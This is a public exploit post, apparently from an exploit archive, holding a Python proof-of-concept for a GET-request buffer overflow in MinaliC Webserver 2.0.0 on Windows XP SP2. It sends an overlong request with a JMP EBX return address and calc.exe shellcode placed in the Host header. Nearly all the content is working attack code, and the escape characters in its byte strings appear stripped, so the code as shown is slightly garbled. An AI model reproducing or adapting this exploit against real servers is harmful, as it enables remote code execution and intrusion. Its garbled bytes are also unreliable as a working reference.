MinaliC Webserver 2.0.0 Buffer Overflow

Posted on 16 April 2013
#!/usr/bin/env python

# Exploit Title: MinaliC Webserver buffer overflow
# Date: 12 Apr 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP2, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request.
#

import socket
import struct

# 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/
shellcode = (
"x31xd2x52x68x63x61x6cx63x89xe6x52x56x64x8bx72" +
"x30x8bx76x0cx8bx76x0cxadx8bx30x8bx7ex18x8bx5f" +
"x3cx8bx5cx1fx78x8bx74x1fx20x01xfex8bx4cx1fx24" +
"x01xf9x0fxb7x2cx51x42xadx81x3cx07x57x69x6ex45" +
"x75xf1x8bx74x1fx1cx01xfex03x3cxaexffxd7xcc"
)

# EIP at offset 245 when minalic.exe is in C:minalicin
# EBX points directly to the "Host:" value, so we put our shellcode there.
# JMP EBX @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English

junk = "x41" * 245
ret = struct.pack("<I", 0x7C955B47)
host = "x90" * 30 + shellcode + "x90" * 31

buf = "GET /" + junk + ret + " HTTP/1.1
" + "Host: " + host + "

"

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.132", 8080))
s.send(buf)
TOP
Malware :

None in database
Last 20
Exploits :

Last 20